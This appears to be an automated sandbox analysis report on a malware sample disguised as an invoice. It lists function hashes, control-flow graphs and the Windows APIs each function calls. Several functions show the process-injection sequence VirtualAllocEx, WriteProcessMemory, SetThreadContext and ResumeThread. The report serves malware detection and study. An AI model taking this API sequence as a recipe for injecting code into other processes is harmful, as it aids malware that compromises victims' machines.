                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4275171209-359210496
                                                                                                                              • Opcode ID: 02a344e45ed4f8ed4be8e215265a053a25f2b3a2742564cd156536b1302af37a
                                                                                                                              • Instruction ID: 10ec1af2c7596105cf125c2ed3b7404cf99d645f16d5c9588e3103bbd3eff8c6
                                                                                                                              • Opcode Fuzzy Hash: 02a344e45ed4f8ed4be8e215265a053a25f2b3a2742564cd156536b1302af37a
                                                                                                                              • Instruction Fuzzy Hash: 4891E0B0A106259FDB25CB29C8906AEFBF6FF89350F24C619D42597269C770EC41CBD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9D338 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 539 2e9d338-2e9d357 541 2e9d359-2e9d366 call 2e9c66c 539->541 542 2e9d383-2e9d387 539->542 547 2e9d368 541->547 548 2e9d37c 541->548 543 2e9d389-2e9d393 542->543 544 2e9d39b-2e9d3dc 542->544 543->544 551 2e9d3e9-2e9d3f7 544->551 552 2e9d3de-2e9d3e6 544->552 598 2e9d36e call 2e9d5e0 547->598 599 2e9d36e call 2e9d5d0 547->599 548->542 554 2e9d3f9-2e9d3fe 551->554 555 2e9d41b-2e9d41d 551->555 552->551 553 2e9d374-2e9d376 553->548 556 2e9d4b8-2e9d578 553->556 558 2e9d409 554->558 559 2e9d400-2e9d407 call 2e9c678 554->559 557 2e9d420-2e9d427 555->557 591 2e9d57a-2e9d57d 556->591 592 2e9d580-2e9d5ab GetModuleHandleW 556->592 562 2e9d429-2e9d431 557->562 563 2e9d434-2e9d43b 557->563 561 2e9d40b-2e9d419 558->561 559->561 561->557 562->563 565 2e9d448-2e9d451 call 2e9c688 563->565 566 2e9d43d-2e9d445 563->566 571 2e9d45e-2e9d463 565->571 572 2e9d453-2e9d45b 565->572 566->565 573 2e9d481-2e9d485 571->573 574 2e9d465-2e9d46c 571->574 572->571 596 2e9d488 call 2e9d8b1 573->596 597 2e9d488 call 2e9d8e0 573->597 574->573 576 2e9d46e-2e9d47e call 2e9c698 call 2e9c6a8 574->576 576->573 578 2e9d48b-2e9d48e 580 2e9d4b1-2e9d4b7 578->580 581 2e9d490-2e9d4ae 578->581 581->580 591->592 593 2e9d5ad-2e9d5b3 592->593 594 2e9d5b4-2e9d5c8 592->594 593->594 596->578 597->578 598->553 599->553
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E9D59E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4139908857-359210496
                                                                                                                              • Opcode ID: b62d388abde0c48799a26ec8b7728e563fb331cde832adc969ff091772b9a2eb
                                                                                                                              • Instruction ID: 1467a69d02ed1940c8cf2bb795258035699d04149cb8ccb58f6a4f93a56a330c
                                                                                                                              • Opcode Fuzzy Hash: b62d388abde0c48799a26ec8b7728e563fb331cde832adc969ff091772b9a2eb
                                                                                                                              • Instruction Fuzzy Hash: 6F813670A00B158FDB28EF29D44479ABBF1FF89308F109A2AD48AD7B50D774E945CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9449C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 600 2e9449c-2e959b9 CreateActCtxA 603 2e959bb-2e959c1 600->603 604 2e959c2-2e95a1c 600->604 603->604 611 2e95a2b-2e95a2f 604->611 612 2e95a1e-2e95a21 604->612 613 2e95a31-2e95a3d 611->613 614 2e95a40-2e95a70 611->614 612->611 613->614 618 2e95a22-2e95a2a 614->618 619 2e95a72-2e95af4 614->619 618->611 622 2e959af-2e959b9 618->622 622->603 622->604
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E959A9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2289755597-359210496
                                                                                                                              • Opcode ID: a151e5c333aaf54f05ef9a1523460b811e9810e996c5a0997f0a29c8094badae
                                                                                                                              • Instruction ID: 44a941546d063850e734fbf3b925eef03c4a74385f3cdb1c0ee616b359db2e8e
                                                                                                                              • Opcode Fuzzy Hash: a151e5c333aaf54f05ef9a1523460b811e9810e996c5a0997f0a29c8094badae
                                                                                                                              • Instruction Fuzzy Hash: 4641CFB0C00719CBEB24DFA9C884BDDBBB5BF49304F60806AD409AB255DBB16945CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E958ED Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 623 2e958ed-2e958f4 624 2e958fc-2e959b9 CreateActCtxA 623->624 626 2e959bb-2e959c1 624->626 627 2e959c2-2e95a1c 624->627 626->627 634 2e95a2b-2e95a2f 627->634 635 2e95a1e-2e95a21 627->635 636 2e95a31-2e95a3d 634->636 637 2e95a40-2e95a70 634->637 635->634 636->637 641 2e95a22-2e95a2a 637->641 642 2e95a72-2e95af4 637->642 641->634 645 2e959af-2e959b9 641->645 645->626 645->627
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E959A9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2289755597-359210496
                                                                                                                              • Opcode ID: b56c9a2b5a17ecef79c6af163022732f10338fb40682f715482665e9b8d99419
                                                                                                                              • Instruction ID: 544805555ff78b0e933dfa5b6870b68a1c24165b26fdc110c2dbad1701691e6c
                                                                                                                              • Opcode Fuzzy Hash: b56c9a2b5a17ecef79c6af163022732f10338fb40682f715482665e9b8d99419
                                                                                                                              • Instruction Fuzzy Hash: 9841D1B0C00719CBEF24DFA9C884BDDBBB5BF49304F60815AD419AB255DBB16949CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B4CC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 646 72b4cc0-72b4ce0 648 72b4c92-72b4cbb 646->648 649 72b4ce2-72b4d5c 646->649 650 72b54f0-72b5555 FindCloseChangeNotification 648->650 652 72b555e-72b5586 650->652 653 72b5557-72b555d 650->653 653->652
                                                                                                                              APIs
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,072B53A1,?,?), ref: 072B5548
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2591292051-359210496
                                                                                                                              • Opcode ID: c93a86da396ef31ff5059978236fa4c093e1574d7a6464a5fa642501b9085bcc
                                                                                                                              • Instruction ID: ead85cc2065a0c58f1b6dfaaa018620c46adb07fe97219347ef2f88a16905bda
                                                                                                                              • Opcode Fuzzy Hash: c93a86da396ef31ff5059978236fa4c093e1574d7a6464a5fa642501b9085bcc
                                                                                                                              • Instruction Fuzzy Hash: 4A31E1B2C143488FDB20DFAAC4457DABBF0EF49320F14846AD959AB351D778D445CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2B50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70injectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 656 72b2b50-72b2ba6 658 72b2ba8-72b2bb4 656->658 659 72b2bb6-72b2bf5 WriteProcessMemory 656->659 658->659 661 72b2bfe-72b2c2e 659->661 662 72b2bf7-72b2bfd 659->662 662->661
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072B2BE8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3559483778-359210496
                                                                                                                              • Opcode ID: b9821a270491f589b7da1b1bdae39680617a16da87792912ecad7a3a08a61372
                                                                                                                              • Instruction ID: 50bc12ea559401508cc2fb716c020ff95187bdd33f89d8d9470579a31eaeae98
                                                                                                                              • Opcode Fuzzy Hash: b9821a270491f589b7da1b1bdae39680617a16da87792912ecad7a3a08a61372
                                                                                                                              • Instruction Fuzzy Hash: 682148B5900359DFDB10CFA9C985BEEBBF5FF48310F14842AE958A7240CB789941CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2B58 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 666 72b2b58-72b2ba6 668 72b2ba8-72b2bb4 666->668 669 72b2bb6-72b2bf5 WriteProcessMemory 666->669 668->669 671 72b2bfe-72b2c2e 669->671 672 72b2bf7-72b2bfd 669->672 672->671
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072B2BE8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3559483778-359210496
                                                                                                                              • Opcode ID: c57ce02154102527b040f6018a561a5adc345c6162ce36f15cceb3c0e8db9187
                                                                                                                              • Instruction ID: 45f1b0cf5c8fbca53704b5cb82f1aaf5ce2db153c5cea2ac072471c6697dadb9
                                                                                                                              • Opcode Fuzzy Hash: c57ce02154102527b040f6018a561a5adc345c6162ce36f15cceb3c0e8db9187
                                                                                                                              • Instruction Fuzzy Hash: CA212AB5900359DFDB10DFAAC884BDEBBF5FF48310F108429E919A7240CB789955CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9F81C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9FBF6,?,?,?,?,?), ref: 02E9FCB7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3793708945-359210496
                                                                                                                              • Opcode ID: 9125f91c4314ef7e0a05240c75c1052b2143f0ed8746e9e8585a828a3c3598f8
                                                                                                                              • Instruction ID: 234a3dd52a5d50dba6965763d2786d356f72ae85d3a5386d10a78d36fc8b5a56
                                                                                                                              • Opcode Fuzzy Hash: 9125f91c4314ef7e0a05240c75c1052b2143f0ed8746e9e8585a828a3c3598f8
                                                                                                                              • Instruction Fuzzy Hash: A521E4B5D00348AFDB10CFAAD584BEEBBF4EB48314F14841AE914A7310D374A950CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9FC29 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9FBF6,?,?,?,?,?), ref: 02E9FCB7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3793708945-359210496
                                                                                                                              • Opcode ID: ba00e9562c86d699ab1880fe6025ddb5148007ac2aa8fd66520b4dc4306ff15f
                                                                                                                              • Instruction ID: 0851a927dda450f407495e3d0f314ac575c770b3f1d6ff232b8616620b7b7365
                                                                                                                              • Opcode Fuzzy Hash: ba00e9562c86d699ab1880fe6025ddb5148007ac2aa8fd66520b4dc4306ff15f
                                                                                                                              • Instruction Fuzzy Hash: 1021E3B59003489FDB10CFAAD985AEEBBF4EB48314F14841AE914A3310C374A944CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2758 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072B27DE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 983334009-359210496
                                                                                                                              • Opcode ID: 5a4dd6184cc43cb64699072bb58e37d112b11ab70c3a2cf2d102711f9d6513ce
                                                                                                                              • Instruction ID: c3676315a99e1e335ecf1c1a79d8dbe2b7e38309c3066135eddf02d74eb8c077
                                                                                                                              • Opcode Fuzzy Hash: 5a4dd6184cc43cb64699072bb58e37d112b11ab70c3a2cf2d102711f9d6513ce
                                                                                                                              • Instruction Fuzzy Hash: BF2137B5D003098FDB24DFAAC5857EEBBF5EF48354F14842AD819A7240CB789945CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2760 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072B27DE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 983334009-359210496
                                                                                                                              • Opcode ID: 72e4c582fc7b26c3a7deb07d7d4fd0004f8eaa5f32ebc71f7c12fcb7ae2dfb45
                                                                                                                              • Instruction ID: f64b09afb8d8d96a0445840e0b1f2ead169f0d5df8098255779962580fe48baf
                                                                                                                              • Opcode Fuzzy Hash: 72e4c582fc7b26c3a7deb07d7d4fd0004f8eaa5f32ebc71f7c12fcb7ae2dfb45
                                                                                                                              • Instruction Fuzzy Hash: 702137B1D003098FDB24DFAAC484BEEBBF5EF48354F148429D819A7240CB789945CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2C48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072B2CC8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1726664587-359210496
                                                                                                                              • Opcode ID: 139e1ad6bfa3ca23078b955ff87430c916f047cc3ae40a842e6117baea877616
                                                                                                                              • Instruction ID: fb9338d36c66deee970c1f0e6e5bd34eb990f99a81fdd7538249a73ee397645f
                                                                                                                              • Opcode Fuzzy Hash: 139e1ad6bfa3ca23078b955ff87430c916f047cc3ae40a842e6117baea877616
                                                                                                                              • Instruction Fuzzy Hash: 612128B1C003599FDB20DFAAC880BEEBBF5FF48310F508429E918A7250C7789941CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2C41 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072B2CC8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1726664587-359210496
                                                                                                                              • Opcode ID: 23e5fd1cefc4027b0c9ff4b8dbf00ea6ec52590fcb2d22407a7ef0445a4c7d22
                                                                                                                              • Instruction ID: cf73fdee682bbc63d0284c1b30be34296646c87fc71a2e2cd8149ce5e7174669
                                                                                                                              • Opcode Fuzzy Hash: 23e5fd1cefc4027b0c9ff4b8dbf00ea6ec52590fcb2d22407a7ef0445a4c7d22
                                                                                                                              • Instruction Fuzzy Hash: 542116B5C003599FDB10DFAAC985BEEBBF5FF48310F14842AE958A7250C7789541CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9C6D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9D619,00000800,00000000,00000000), ref: 02E9D82A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1029625771-359210496
                                                                                                                              • Opcode ID: 722e654ae07c13f80ed872357ffd509b2a873ce992ce3eb384a2a12fef7b6f65
                                                                                                                              • Instruction ID: 4dc5d51220636c391218fbf3ef082df1e723d6dc420d6454e8cf21a99fb8b8d4
                                                                                                                              • Opcode Fuzzy Hash: 722e654ae07c13f80ed872357ffd509b2a873ce992ce3eb384a2a12fef7b6f65
                                                                                                                              • Instruction Fuzzy Hash: 7B1114B6D003598FDB20DF9AD844BEEFBF4EB88714F10842AD919A7200C375A545CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2A90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072B2B06
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4275171209-359210496
                                                                                                                              • Opcode ID: f3529ffa58912f532a74f8eef3e01611125a1b71e00333eff88476ef31ecd391
                                                                                                                              • Instruction ID: 2b4b95dbbd0fde256ddf6538097b047dc36d951d42801d93e42822c6f6e8ba6b
                                                                                                                              • Opcode Fuzzy Hash: f3529ffa58912f532a74f8eef3e01611125a1b71e00333eff88476ef31ecd391
                                                                                                                              • Instruction Fuzzy Hash: 571156B69003499FDB20DFAAD844BEEBBF5BF48310F248819D559A7250CB759541CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B26A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 947044025-359210496
                                                                                                                              • Opcode ID: 8c897c0c7691a222c29343d92c884f076d30ec26d8f0fcde717fb4c1fb14f631
                                                                                                                              • Instruction ID: 196e093952b5a8f5b354b8b816044cbdf36a75d7f596e22282d811736e1638ed
                                                                                                                              • Opcode Fuzzy Hash: 8c897c0c7691a222c29343d92c884f076d30ec26d8f0fcde717fb4c1fb14f631
                                                                                                                              • Instruction Fuzzy Hash: D8116AB1D003498FDB24DFAAC8457DEFBF5EF88320F248819D419A7240CB79A941CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9D7B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9D619,00000800,00000000,00000000), ref: 02E9D82A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 1029625771-359210496
                                                                                                                              • Opcode ID: 3c36dfd46be5c8761e717172b46970b95e3dc9e1adcfaa3f461195fc3e7caa1b
                                                                                                                              • Instruction ID: 9b5ffc090de56676975a87954eacdf0d9fddfb22c012460275ed26e107bc55d4
                                                                                                                              • Opcode Fuzzy Hash: 3c36dfd46be5c8761e717172b46970b95e3dc9e1adcfaa3f461195fc3e7caa1b
                                                                                                                              • Instruction Fuzzy Hash: 081112B6D003498FDB24DFAAD944BEEFBF4AB48314F14842AD819A7201C378A545CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B4CB4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,072B53A1,?,?), ref: 072B5548
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2591292051-359210496
                                                                                                                              • Opcode ID: f217622514d9f86b0c36afa676fd38b6f1cba895a8346bcd5327000b1626c961
                                                                                                                              • Instruction ID: 1ae2163806ca65191778321193d450387150758f31411def25999516dc043b11
                                                                                                                              • Opcode Fuzzy Hash: f217622514d9f86b0c36afa676fd38b6f1cba895a8346bcd5327000b1626c961
                                                                                                                              • Instruction Fuzzy Hash: D2113AB58103498FDB20DF9AD444BDEBBF5EB48320F148419D958A7341D778A944CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B26B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 947044025-359210496
                                                                                                                              • Opcode ID: 487221b232fe8d6633833ae636d229bf478f7ded7811b109d0a3ae5f9cad6fdb
                                                                                                                              • Instruction ID: c3a57b64865289a5e54ea66f2e43d2d99da5a7d16c507b68982bdc8da92f0cd2
                                                                                                                              • Opcode Fuzzy Hash: 487221b232fe8d6633833ae636d229bf478f7ded7811b109d0a3ae5f9cad6fdb
                                                                                                                              • Instruction Fuzzy Hash: D81136B1D003498FDB24DFAAD4447EEFBF5EF88324F248819D419A7240CB79A945CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E9D538 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
